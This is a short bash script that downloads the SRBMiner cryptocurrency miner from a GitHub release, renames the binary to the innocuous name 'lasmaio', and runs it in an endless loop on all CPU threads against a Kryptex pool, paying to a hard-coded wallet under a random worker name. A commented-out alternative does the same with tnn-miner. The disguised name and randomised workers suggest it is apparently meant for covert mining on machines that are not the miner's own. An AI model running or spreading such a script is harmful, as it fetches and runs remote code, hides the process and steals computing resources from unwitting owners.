#!/bin/bash
wget https://github.com/kryptex-miners-org/kryptex-miners/releases/download/srbminer-3-6-9/SRBMiner-Multi-3-6-9-Linux.tar.gz
tar xf SRBMiner-Multi-3-6-9-Linux.tar.gz
mv SRBMiner-MULTI lasmaio
while true; do
./lasmaio --disable-gpu --algorithm xelishashv3 --pool xel.kryptex.network:7019 --wallet xel:ns93l5nhjnwgkd6l3xrwf332prju6mupp94wle936acw5fsv4fnsqn7sfjy/$(echo $RANDOM | md5sum | head -c 10) --cpu-threads $(nproc --all)
done



#wget https://gitlab.com/Tritonn204/tnn-miner/-/releases/v0.8.2/downloads/Tnn-miner-amd64-v0.8.2.tar.gz
#tar xf Tnn-miner-amd64-v0.8.2.tar.gz
#./tnn-miner --no-gpu --dev-fee 1 --stratum --daemon-address stratum+tcp://xel.kryptex.network:7019 --wallet xel:ns93l5nhjnwgkd6l3xrwf332prju6mupp94wle936acw5fsv4fnsqn7sfjy/$(echo $RANDOM | md5sum | head -c 10) --threads $(nproc --all)
